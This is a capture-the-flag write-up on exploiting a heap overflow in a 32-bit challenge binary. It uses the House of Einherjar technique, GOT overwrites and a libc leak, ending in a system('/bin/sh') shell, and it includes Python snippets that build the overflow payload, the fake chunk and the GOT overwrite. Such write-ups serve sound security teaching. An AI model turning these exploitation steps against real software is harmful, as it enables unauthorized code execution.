For this challenge created by Uafio, we are given a program and its corresponding source code.
If we run checksec, we can see that NX is enabled, but PIE is disabled and RELRO is only partially enabled.
Therefore, we can perform a GOT overwrite if we’re able to gain a write-what-where primitive and leak the address of system() in libc.
There is an obvious heap overflow vulnerability in choice 4, which allows us to write 0x100 bytes into a heap chunk allocated for a 0x80 byte request.
We can use a technique called “House of Einherjar” to exploit this vulnerability in order to gain a write-what-where primitive.
House of Einherjar Exploit
House of Einherjar is another ptmalloc2 heap exploitation technique that gives us the ability to force malloc() to return an arbitrary pointer.
All it requires, at minimum, is a single off-by-one NULL byte overflow primitive and a heap leak.
The way it works is by leveraging a heap overflow in chunk A to corrupt the prev_size and cur_size fields of the next bordering chunk, chunk B, so that the prev_inuse bit in the cur_size field of chunk B is flipped off, and so that chunk B’s prev_size field is overwritten with a very large value.
This tricks the memory allocator into thinking that chunk B’s previous bordering chunk is free, so that it then attempts to perform a backwards consolidation with it, using the corrupted prev_size field to calculate the beginning of this fake free chunk.
Once the consolidation is complete, and the chunk is placed in the unsorted freelist bin, the next malloc() call should return a pointer to where the memory allocator thinks this newly merged free chunk starts.
This gives us a write-what-where primitive, if we are also allowed to write data that we control into this heap chunk.
Although we are given a very large heap overflow in this particular program, we can also pull off House of Einherjar with just a single off-by-one null byte overflow into a heap chunk whose size is ideally aligned with 0x100 (plus the 0x1 prev_inuse bit).
Regardless of the severity of the heap overflow, House of Einherjar does require a heap leak in order to work!
I will explain why as we go along.
So, with that being said, how do we perform a House of Einherjar exploit?
First we will allocate 3 chunks. Let’s call the first chunk: A, the second chunk: B, the third chunk: C.
Then we will overflow chunk A’s data that we control, into chunk B’s metadata.
Specifically, we will corrupt the prev_size field of chunk B and overwrite it with a large value and corrupt the cur_size field of chunk B by flipping its prev_inuse bit off.
Flipping the prev_inuse bit off will trick the memory allocator into thinking that chunk B’s previous bordering chunk is free.
The large value that we will overwrite the prev_size field with, which should right now be empty as no chunks have been freed yet, is determined by using the following calculation: new_size = chunk_B - target. target is the arbitrary address minus 8 bytes that we would like the next malloc() to return. chunk_B is the address of chunk B on the heap, which is what malloc() returns minus 8 bytes. And finally, new_size is just the large value that we will place in the prev_size field.
The astute reader will realize that we need a heap leak in order to make this calculation.
For example, if chunk B’s actual address (not what malloc() returns), is at address 0x8858088 and we want malloc() to return an address within the tmp global array, say, 0x804a0b8, the prev_size of chunk B will be overwritten with 0x8858088 - 0x804a0b0 = 0x80dfd8.
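The arithmetic above can be checked with a few lines of Python. This is only a sketch: the function and constant names are made up for illustration, and the addresses are the example values from this particular run, so the heap address will differ every time.

```python
# Example values from the walkthrough; the heap address changes between runs.
CHUNK_B = 0x8858088       # address of chunk B's header (malloc() return value minus 8)
WANTED_PTR = 0x804a0b8    # what we want the next malloc() to return (inside tmp)
HEADER_SIZE = 8           # prev_size + cur_size fields on 32-bit

def fake_prev_size(chunk_b, wanted_ptr):
    """Return the value to write into chunk B's prev_size field."""
    target = wanted_ptr - HEADER_SIZE          # start of the fake chunk
    return (chunk_b - target) & 0xffffffff     # keep the result within 32 bits

new_size = fake_prev_size(CHUNK_B, WANTED_PTR)
print(hex(new_size))
```

The 32-bit mask is there so the same helper still gives a usable value if the target happens to sit above chunk B in memory.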
The reason for this calculation is because when a heap chunk is about to be freed, the memory allocator checks to see if either the heap chunk after it or the heap chunk before it are also free.
If the chunk after it is also free, it performs a forward consolidation of the two chunks and places the result in the appropriate freelist.
If, however, it is the chunk before it that is free, then a backwards consolidation is performed.
If both A and C are free and then B is freed, both a forward AND backwards consolidation are performed.
The prev_size is used in backwards consolidations to determine where the previous bordering chunk is located.
It will do something like chunk_B - chunk_B->prev_size and the resulting address will be what the memory allocator thinks is the start of the previous free chunk.
By setting this prev_size field to a large value, we can potentially trick the memory allocator into thinking that the previous chunk starts somewhere at a much different address than it should. Perhaps, even in an area in the .BSS segment or the GOT ;)
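To make the backwards consolidation concrete, here is a small model of the address and size arithmetic. It is a simplification and not glibc code: it ignores the unlink step and the forward consolidation, and the function name is hypothetical. The inputs are the example values used in this writeup.

```python
MASK32 = 0xffffffff
PREV_INUSE = 0x1
FLAG_BITS = 0x7   # the low three bits of cur_size are flags, not size

def consolidate_backward(chunk_addr, prev_size, size_field):
    """Model the arithmetic free() does when the previous chunk looks free.

    Returns (start of merged chunk, merged size without flag bits),
    or None if prev_inuse is set and no backwards merge happens.
    """
    if size_field & PREV_INUSE:
        return None
    size = size_field & ~FLAG_BITS
    merged_start = (chunk_addr - prev_size) & MASK32   # chunk_B - chunk_B->prev_size
    merged_size = (size + prev_size) & MASK32
    return merged_start, merged_size

start, size = consolidate_backward(0x8858088, 0x80dfd8, 0x88)
print(hex(start), hex(size))
```

With the untouched size field of 0x89 the function returns None, which is why the prev_inuse bit has to be cleared first.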
For this particular program, we will get malloc() to return an address from within the tmp global array.
Then we will write data to this newly malloc’d chunk and overwrite pointers stored in the ptrs global array, which is located immediately after the tmp global array.
This is what the heap looks like before any data is written to chunk A.
And here is what it looks like after:
Notice how we’ve changed chunk B’s cur_size field from 0x89 to 0x88, in order to flip the prev_inuse bit off.
Besides that bit, we still need to preserve the original size field of that chunk, as this size is also used to check whether or not the bordering next chunk is free.
Also note that we have overwritten the prev_size field with 0x80dfd8, using the calculation mentioned before.
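The bytes written into chunk A could be built roughly like this. It is a sketch under one assumption: that chunk B's prev_size field sits directly after chunk A's 0x80 bytes of user data, which is what a 0x80 byte request on 32-bit should give us. The helper name and the filler byte are arbitrary.

```python
import struct

REQUEST_SIZE = 0x80         # size requested for chunk A
FAKE_PREV_SIZE = 0x80dfd8   # chunk_B - target, from the example run
CHUNK_B_SIZE = 0x88         # original 0x89 with the prev_inuse bit cleared

def build_overflow(prev_size, size_field, filler=b"A"):
    """Fill chunk A, then overwrite chunk B's prev_size and cur_size fields."""
    # Assumption: B's header starts right after A's 0x80 bytes of user data.
    padding = filler * REQUEST_SIZE
    return padding + struct.pack("<II", prev_size, size_field)

payload = build_overflow(FAKE_PREV_SIZE, CHUNK_B_SIZE)
print(len(payload), payload[-8:].hex())
```

The payload is 0x88 bytes long, well within the 0x100 bytes that choice 4 lets us write.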
In our tmp global buffer, we’ve set up our fake chunk as follows.
Our fake chunk will start at 0x804a0b0. There is no need to set the cur_size field of this fake chunk to anything so we just set it to 0x0.
Our p->fd and p->bk pointers are both set to point back to the fake chunk itself, 0x0804a0b0, which allows us to bypass the safe unlinking checks, which verify that p->fd->bk == p and p->bk->fd == p.
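Here is a toy model of why the self-referencing pointers pass the safe unlinking checks. It assumes the 32-bit chunk layout (prev_size at +0, cur_size at +4, fd at +8, bk at +12) and represents memory as a plain dictionary; the helper names are hypothetical.

```python
import struct

FAKE_CHUNK = 0x804a0b0   # start of the fake chunk inside tmp
FD_OFFSET = 8            # offset of fd in a 32-bit chunk
BK_OFFSET = 12           # offset of bk in a 32-bit chunk

def build_fake_chunk(addr, size=0):
    """prev_size, cur_size, fd, bk, with fd and bk pointing back at the chunk."""
    return struct.pack("<IIII", 0, size, addr, addr)

def load(memory, addr, data):
    """Store data into the toy memory as 32-bit little-endian words."""
    for i in range(0, len(data), 4):
        memory[addr + i] = struct.unpack("<I", data[i:i + 4])[0]

def passes_safe_unlink(memory, p):
    """Check p->fd->bk == p and p->bk->fd == p."""
    fd = memory[p + FD_OFFSET]
    bk = memory[p + BK_OFFSET]
    return memory.get(fd + BK_OFFSET) == p and memory.get(bk + FD_OFFSET) == p

memory = {}
load(memory, FAKE_CHUNK, build_fake_chunk(FAKE_CHUNK))
print(passes_safe_unlink(memory, FAKE_CHUNK))
```

Because fd and bk both equal p, the two checks collapse to p->bk == p and p->fd == p, which we control directly.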
After we call free() on chunk B, we can observe that it has successfully been backwards consolidated with a fake chunk at address 0x804a0b0.
Notice that the size is now very large: 0x0080e061.
That is because the memory allocator now thinks that this chunk takes up all the memory space from 0x804a0b0 to 0x8858114.
This is no good and will cause the next malloc() to fail due to size checks.
Therefore, we need to edit our tmp global buffer again, but this time, simply to replace the fake chunk size with something much smaller.
A fake chunk size of 0x100 will do.
Of course, this means that the newline character that comes at the end of our stdin input will corrupt fake_chunk->fd, but we don’t care about that, as no checks are run on it!
Once we’ve made that change, we observe that our next malloc() call successfully returns 0x804a0b8!
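A rough model of why the size had to shrink is below. I am assuming the check that trips is the unsorted bin sanity check in glibc's _int_malloc, which rejects chunks whose size is too small or larger than the arena's system_mem. The 0x21000 value is an assumption for a freshly initialized heap, not something measured on this target.

```python
SIZE_SZ = 4                     # size of a size field on 32-bit
ASSUMED_SYSTEM_MEM = 0x21000    # assumption: memory obtained so far by the main arena

def passes_unsorted_size_check(size_field, system_mem=ASSUMED_SYSTEM_MEM):
    """Approximate the 'malloc(): memory corruption' sanity check."""
    return 2 * SIZE_SZ < size_field <= system_mem

for size in (0x80e061, 0x100):
    print(hex(size), passes_unsorted_size_check(size))
```

Under those assumptions the consolidated size of 0x0080e061 is rejected, while 0x100 is accepted and is still large enough to serve a 0x80 byte request.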
Now that we have successfully forced malloc() to return an arbitrary pointer in the middle of the tmp global, we need to leverage this somehow to get code execution.
Because this is a dynamically linked binary, we already have the system() function loaded into memory from libc.
Also, remember that only partial RELRO is enabled, which allows us to perform a GOT overwrite and force one of the GOT entries to inappropriately call system() while passing in a pointer to the string "/bin/sh\0".
In order to do this though, we first need to get an infoleak in order to get the base address of libc so that we can dynamically resolve the address of system@libc, which changes every time the process starts, due to ASLR.
If we examine what our .got.plt and .bss sections look like right now, after our House of Einherjar malloc() has finished and the pointer to our newly malloc’d chunk has been placed in the ptrs global array, we will see the following.
We can associate the .got.plt entries which start at 0x804a00c, with the following functions.
Let’s take a quick look again at the free code block.
It looks like if we can trash the GOT and overwrite free@got with the address of puts(), we can print out arbitrary data from a pointer we place into the ptrs array. This would give us a read-what-where primitive, and the ability to leak out GOT entries!
Unfortunately, we don’t know the address of puts@libc or puts@got yet, so we can’t overwrite free@got with either of those addresses.
However, we can still get this infoleak to work if we replace the GOT entry for free@got, located at 0x804a010, with the address of puts@plt, or 0x8048490.
Observe that the first instruction of puts@plt is a jmp to puts@got, which will already be populated with the correct puts@libc address.
So, basically, we will make *0x804a010 = 0x8048490, write the GOT address that we’d like to leak into ptrs, and then pass in the index of that ptrs entry.
In my final exploit, I could not overwrite only free@got, because the newline char from our user input would annoyingly leak into the lsb of getchar@got and cause a segfault the next time getchar() was called.
Basically it would turn this:
0xf75ae40a is not the address we want executing when getchar() is called!
So, to get around this issue, I overwrote getchar@got and fgets@got with their corresponding @plt entries +6! Or 0x08048466 and 0x08048476, respectively.
We add 6 to the PLT addresses because the first instruction of any .plt entry is just a jump to the address stored in the corresponding .got.plt entry, which would’ve caused an infinite loop.
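The GOT overwrite described above could be packed as follows. This is a sketch with two assumptions: that free@got, getchar@got and fgets@got are laid out back to back starting at 0x804a010 (which is what the newline spilling from one entry into the next suggests), and that the PLT entry addresses are simply the +6 values quoted above minus 6.

```python
import struct

FREE_GOT = 0x804a010      # first GOT entry we overwrite
PUTS_PLT = 0x8048490      # free() will now jump to puts@plt
GETCHAR_PLT = 0x8048460   # derived from 0x08048466 - 6
FGETS_PLT = 0x8048470     # derived from 0x08048476 - 6
PLT_RESOLVER_SKIP = 6     # skip the initial jmp so the lazy resolver runs again

def build_got_overwrite():
    """Values for free@got, getchar@got and fgets@got, in that assumed order."""
    return struct.pack(
        "<III",
        PUTS_PLT,
        GETCHAR_PLT + PLT_RESOLVER_SKIP,
        FGETS_PLT + PLT_RESOLVER_SKIP,
    )

got_payload = build_got_overwrite()
print(got_payload.hex())
```

Pointing getchar@got and fgets@got at their PLT entries +6 restores them to the unresolved state, so the dynamic linker resolves them again on the next call.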
The astute reader will now point out that the newline char would just move over into the lsb of malloc@got, which is correct, but we don’t actually care that malloc@got is now corrupt because we don’t plan on calling malloc() again for the rest of our exploit!
So to put all this together, I wrote the addresses of the GOT entries I wanted to leak into the ptrs array, and called the free() function, which now actually calls puts@plt, on each one of the ptrs indices.
Ultimately, this is what our .got.plt and .bss sections should look like after everything is correctly setup, but before the free()’s.
Note that 0x08048466 will be overwritten with getchar@libc the next time getchar() or getchar@plt is called. Therefore, we will still be able to leak out getchar@libc.
After all of our free() calls are done, we get the following leaks.
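Each leak arrives as raw bytes printed by puts(), so it needs to be turned back into a 32-bit address. The helper below is a minimal sketch; the sample bytes are made up for illustration and are not the real leak from this run.

```python
import struct

def parse_leak(raw):
    """Turn the bytes printed by puts() into a 32-bit little-endian address.

    raw is the output for one leak with puts()'s trailing newline already removed.
    puts() stops at the first NUL byte, so the leak may be shorter than 4 bytes,
    or longer if the neighbouring GOT entry has no NUL bytes either.
    """
    data = raw[:4].ljust(4, b"\x00")
    return struct.unpack("<I", data)[0]

# Hypothetical output: one full address followed by bytes of the next GOT entry.
sample = b"\x90\x59\x5e\xf7\x10\xa4"
print(hex(parse_leak(sample)))
```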
Often times when doing these types of challenges on a remote server, we will not know what libc the challenge is using.
One way to get around this is to use a tool like libc-database to look in a database of libc’s.
Another option is to use DynELF.
For my exploit, I just used libc-database and checked my leaks against a local corpus of libc’s that our CTF team, OpenToAll has.
The first command, find, just looks up our specified name and address in our libc corpus and returns any hits.
In this case, it returned 2 hits, but both libc’s are actually the same, so we can just dump offsets for one of them.
This gives us the offset of system@libc from libc_base: 0x40190.
But for us to dynamically calculate system@libc, we still need to know an offset of one of our leaks from libc_base.
Grepping through the libc’s symbols tells us what we need.
It looks like __libc_start_main@libc exists at an offset of 0x1990 from libc_base.
With this information, we now have all we need to dynamically calculate the address of system@libc!
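The calculation itself is just two steps, sketched here with the offsets quoted above. The leaked address in the example is made up, since the real one changes on every run.

```python
MASK32 = 0xffffffff
LIBC_START_MAIN_OFFSET = 0x1990   # offset of __libc_start_main, as quoted above
SYSTEM_OFFSET = 0x40190           # offset of system, as quoted above

def resolve_system(leaked_libc_start_main):
    """Return (libc_base, address of system) from a leaked __libc_start_main."""
    libc_base = (leaked_libc_start_main - LIBC_START_MAIN_OFFSET) & MASK32
    system_addr = (libc_base + SYSTEM_OFFSET) & MASK32
    return libc_base, system_addr

HYPOTHETICAL_LEAK = 0xf7571990    # made-up value for illustration only
libc_base, system_addr = resolve_system(HYPOTHETICAL_LEAK)
print(hex(libc_base), hex(system_addr))
```

A quick sanity check is that libc_base should come out page aligned; if it does not, the libc guess or the leak is probably wrong.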
Protip: to update your local libc-database corpus, just run ./get and if a repo fails, just comment it out and try again.
The final step of our exploit will be overwriting a GOT entry to make it call system("/bin/sh\0");.
free@got is, again, a suitable candidate, because it takes in a pointer that we can control in ptrs.
We choose to write the string “/bin/sh” ourselves into ptrs rather than using the “/bin/sh” leak we got from libc-database because the libc offset, 0x160a24, contains a newline char which can be problematic.
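A quick way to spot this kind of problem is to pack the value and look for the 0x0a byte. The helper name is hypothetical, and the libc base below is invented for the example; whether the final address still contains a newline depends on the actual base.

```python
import struct

def has_newline(value):
    """True if the 32-bit little-endian encoding of value contains 0x0a."""
    return b"\n" in struct.pack("<I", value & 0xffffffff)

BIN_SH_OFFSET = 0x160a24          # "/bin/sh" offset reported by libc-database
HYPOTHETICAL_BASE = 0xf7500000    # made-up libc base for illustration

print(has_newline(BIN_SH_OFFSET))
print(has_newline(HYPOTHETICAL_BASE + BIN_SH_OFFSET))
```

Since our input is read line by line, any value containing 0x0a would be cut short, so writing the string into ptrs ourselves avoids the issue entirely.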
So, after the ptrs array is set up, it should look like this:
And the free@got entry should now be overwritten with the calculated address of system@libc.
We will finally call free(1) to execute system("/bin/sh\0");!
Putting everything together, we are able to get a shell using the following exploit.